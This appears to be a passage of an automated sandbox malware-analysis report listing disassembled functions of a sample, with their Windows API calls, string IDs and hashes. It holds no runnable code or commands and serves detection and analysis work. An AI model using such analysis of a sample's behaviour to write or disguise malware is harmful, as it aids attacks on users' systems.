                            • Instruction Fuzzy Hash: 8B11B275200208AFFF119F54CC81EFB376AEB4A3A8F12412AF91897390D639DC5187A5
                            Function 004496F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: 955be5b0b082054bc2d16830f79eafc75fea3155be930f647537643ad6e82cbf
                            • Instruction ID: fdd1e5540bc1651a1a3907f159ad4ce4bf2ad4b0f4a468bab6966d0ee0e36134
                            • Opcode Fuzzy Hash: 955be5b0b082054bc2d16830f79eafc75fea3155be930f647537643ad6e82cbf
                            • Instruction Fuzzy Hash: F8215C39124508FFFB109F54CC45FBB37A4EB09310F404166FA16DA2E0D679AD11AB69
                            Function 00446C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                            • GetWindowRect.USER32(00000000,?), ref: 00446C71
                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00446C8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: 6349e165c1c1f3b479a81c64f9a76c39b593b9aaa21c9ac79f5c2ca1c5839c9a
                            • Instruction ID: a8d3cc531d5013543b61a6715bc96a04b917f19826e1b0dab854a53257b0fd69
                            • Opcode Fuzzy Hash: 6349e165c1c1f3b479a81c64f9a76c39b593b9aaa21c9ac79f5c2ca1c5839c9a
                            • Instruction Fuzzy Hash: 13215672610209AFEF04DFA8CC85EFABBB8FB09304F014629FD95D2250D639E851DB65
                            Function 0044678B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateMenuPopup
                            • String ID: `$
                            • API String ID: 3826294624-74666722
                            • Opcode ID: 7ed6e2117de04ae8da02fd27bd4d8bb6885f19639570e206cc0d35fac3bde031
                            • Instruction ID: 56abf209474e044b5328d5d88b844d6f1e06ec16b451d2c9b919beb72069f484
                            • Opcode Fuzzy Hash: 7ed6e2117de04ae8da02fd27bd4d8bb6885f19639570e206cc0d35fac3bde031
                            • Instruction Fuzzy Hash: 56219D78500609DFDB20DF28D444BD67BE1FB0A324F05856AE8598B391C339AC56CF5A
                            Function 00446920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 004469A2
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004469B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: ffd6b10151beb75c1a727a9309a537149b3c4383082fc1c2730b9f4f52379b49
                            • Instruction ID: b25b249498e376653a47d146f79de01265bf8ff06b7b84b4f893b877e9c05e0b
                            • Opcode Fuzzy Hash: ffd6b10151beb75c1a727a9309a537149b3c4383082fc1c2730b9f4f52379b49
                            • Instruction Fuzzy Hash: ED119DB1100104ABFF108F649C40AAB37A9EB06378F514729F9A5962E0C6B9DC919769
                            Function 004229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: 2c7ca90437079b3b191b350bcfb548b2809233641b74a9f59f6a511539fab4ad
                            • Instruction ID: 50850b0bedc7761b8d9dc0252043faec4e8f8eb08879517dd71e2a017bd5edc6
                            • Opcode Fuzzy Hash: 2c7ca90437079b3b191b350bcfb548b2809233641b74a9f59f6a511539fab4ad
                            • Instruction Fuzzy Hash: 5311E432F00125BACB35DB58E944B9F73A8AB45340F444027E815EB290D7B4AD16C799
                            Function 004321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0043222C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00432255
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: 14161c38d667d03bfe65642779b78b60e9b5a81bd312d0e8061af254ee5c07b3
                            • Instruction ID: b8bdda706ceb4376d6e6d0ba1a37d318705756cc2d0a638987eeb9ca2663bcdc
                            • Opcode Fuzzy Hash: 14161c38d667d03bfe65642779b78b60e9b5a81bd312d0e8061af254ee5c07b3
                            • Instruction Fuzzy Hash: 37110270541225BADB258F518D88EFBFBA8FF0A751F10926BF91446100D2B85885DAF5
                            Function 004484E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,?,?,?), ref: 00448530
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: `$
                            • API String ID: 3850602802-74666722
                            • Opcode ID: 8c45e82f3b9f0ce80e9ea9dd7a1e2c721dfcf79616fff74119699fb44fd03283
                            • Instruction ID: 4cfa23bc5027b3c1409838c38a83df0c579210554ee889087dec8fb53c460c7f
                            • Opcode Fuzzy Hash: 8c45e82f3b9f0ce80e9ea9dd7a1e2c721dfcf79616fff74119699fb44fd03283
                            • Instruction Fuzzy Hash: 9A21D379A00209EFCB05DF98D8408AE7BB5FB4D350B01455AFD06A7360DB35AD61DBA4
                            Function 003C2327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: c1cd0ff06b87eedd669d272730290fbafef202e7f6847bcb4285e4f4fc2b7aa1
                            • Instruction ID: 18f5894854680428237f918cb87b4de35e953a395ead546fa94039e9c1d21251
                            • Opcode Fuzzy Hash: c1cd0ff06b87eedd669d272730290fbafef202e7f6847bcb4285e4f4fc2b7aa1
                            • Instruction Fuzzy Hash: 18112E746007049FCB21DF29DC40EA5BBE6BB49320F158669FA659B6A0C771ED41CF90
                            Function 003D092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C14,004852F8,?,?,?), ref: 003D096E
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _wcscat.LIBCMT ref: 00404CB7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat
                            • String ID: SH
                            • API String ID: 257928180-228610985
                            • Opcode ID: 78c22879bb4328208116cdb999f3a3a6815b1c9319136bde4be3265324044f74
                            • Instruction ID: b02c7da2b4ea2e22a6b7cdaea3e75a614f7438f6be685e423d5f9aa267acda61
                            • Opcode Fuzzy Hash: 78c22879bb4328208116cdb999f3a3a6815b1c9319136bde4be3265324044f74
                            • Instruction Fuzzy Hash: 8D1182329052089ADB06FB649C06FDE73B8AF08740F0044A7B945DB295EBB4AE844B59
                            Function 00418E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00418E73
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 893eddbd2fc36a244be608cfa5593d7913eb490bc04bd5945d6d02e836536a25
                            • Instruction ID: 06f30856a77d3bc64f410c2e402ccb11306615b7e9d716daa365a137f20e8395
                            • Opcode Fuzzy Hash: 893eddbd2fc36a244be608cfa5593d7913eb490bc04bd5945d6d02e836536a25
                            • Instruction Fuzzy Hash: 4101F171642219AB8B15EBA0CC45EFE7368AF06360B540A1EB826EB2E1DE395C48C755
                            Function 00418CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00418D6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 6693e71e283bfe4a1d6f3eae4fe664addde37dc5828a9ddb61da31f6657b9889
                            • Instruction ID: a2635dfff0050030ebed74a24998dd30cd9ed2ed05acb0a83ee16f4a1890332c
                            • Opcode Fuzzy Hash: 6693e71e283bfe4a1d6f3eae4fe664addde37dc5828a9ddb61da31f6657b9889
                            • Instruction Fuzzy Hash: 3201F771A41209ABCB15EBE0C956FFF73A8DF15340F50002EB806A72D1DE285E48D776
                            Function 00418D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00418DEE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: a87011791f829112e86f333f6858f66105d2185882c8435f37049db27b3cd455
                            • Instruction ID: 70ea83fe8bdc68bcdee8f9d4be7366edabeca6f279eb4da89d1e3e2c6c0ebf90
                            • Opcode Fuzzy Hash: a87011791f829112e86f333f6858f66105d2185882c8435f37049db27b3cd455
                            • Instruction Fuzzy Hash: 4F01F271A41209A7CB11EBA4C946FFF73A88F15340F10402EB806E7292DE295E49D67A
                            Function 0041C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0041C534
                              • Part of subcall function 0041C816: _memmove.LIBCMT ref: 0041C860
                              • Part of subcall function 0041C816: VariantInit.OLEAUT32(00000000), ref: 0041C882
                              • Part of subcall function 0041C816: VariantCopy.OLEAUT32(00000000,?), ref: 0041C88C
                            • VariantClear.OLEAUT32(?), ref: 0041C556
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$Init$ClearCopy_memmove
                            • String ID: d}G
                            • API String ID: 2932060187-3266734438
                            • Opcode ID: 6e94e32e34ff360e6d0ddfd91a0dafdc92c732266ac7277aac4089b576dd9969
                            • Instruction ID: a9ffdb8b43328a72b7cd0e769d4b782f4752df6e137227842e838f47943c1476
                            • Opcode Fuzzy Hash: 6e94e32e34ff360e6d0ddfd91a0dafdc92c732266ac7277aac4089b576dd9969
                            • Instruction Fuzzy Hash: 0311FE719007089FC720DFAAD8C499AB7F8FB18314B50852FE58AD7611E771AA48CB54
                            Function 0044C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,003FB93A,?,?,?), ref: 0044C5F1
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0044C5D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LongWindow$MessageProcSend
                            • String ID: `$
                            • API String ID: 982171247-74666722
                            • Opcode ID: 10d2d17627665d92329b2aeb8d36e7fe9c00aaec25cabfd48f1d7f4cd4562fe3
                            • Instruction ID: 792781854efc6d6ccb54a0f9f494d640d33363cb7f7e7a6169557d8473ac819c
                            • Opcode Fuzzy Hash: 10d2d17627665d92329b2aeb8d36e7fe9c00aaec25cabfd48f1d7f4cd4562fe3
                            • Instruction Fuzzy Hash: A401F530201214BBDB216F14CC84F6F3BA2FB85360F08442AF9411B2E0CB35AC12DB55
                            Function 00424F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: 701514ab40edaa6848b8145215dfbd348f9e490d32468c7d970475ac513362cd
                            • Instruction ID: 145134dbb4543eb12a1cb5ff9126b99318a51472377b2317c9b4df7493e5c78d
                            • Opcode Fuzzy Hash: 701514ab40edaa6848b8145215dfbd348f9e490d32468c7d970475ac513362cd
                            • Instruction Fuzzy Hash: 34E0D8326002387BD7209B9AEC4AFA7F7ACEB85B70F01016BFD04D7191D9649A458BE4
                            Function 003FB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003FB314: _memset.LIBCMT ref: 003FB321
                              • Part of subcall function 003E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003FB2F0,?,?,?,003C100A), ref: 003E0945
                            • IsDebuggerPresent.KERNEL32(?,?,?,003C100A), ref: 003FB2F4
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003C100A), ref: 003FB303
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003FB2FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3158253471-631824599
                            • Opcode ID: 73762ca457d88a431a85b183bffba5d41cd535f3eb5291772098ca543fe5deef
                            • Instruction ID: 1fd5f5a629d03c5e6b6a15ea2ab0ff80e44b29cd1303f135e9d6f5de0a58a918
                            • Opcode Fuzzy Hash: 73762ca457d88a431a85b183bffba5d41cd535f3eb5291772098ca543fe5deef
                            • Instruction Fuzzy Hash: 1FE092B86007508FD722DF28D504756BBE4BF00358F018A7EE486C7251EBF5D848CBA1
                            Function 00401935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00401775
                              • Part of subcall function 0043BFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043BFFE
                              • Part of subcall function 0043BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0040195E,?), ref: 0043C010
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0040196D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                            • String ID: WIN_XPe
                            • API String ID: 582185067-3257408948
                            • Opcode ID: f842c9f91587c0410f60fb3487e2792f3f3adc7172289a83590967d8efffef18
                            • Instruction ID: 403edb5500cd31a8450143b18613e6ec9b47067bf445e1e54c2607c78ad94fd5
                            • Opcode Fuzzy Hash: f842c9f91587c0410f60fb3487e2792f3f3adc7172289a83590967d8efffef18
                            • Instruction Fuzzy Hash: 60F0C970800109DFDB15DB91C984FEDBBF8AB08305F5410AAE102B71A4D7798F85DF69
                            Function 00445964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32 ref: 0044596E
                            • PostMessageW.USER32 ref: 00445981
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
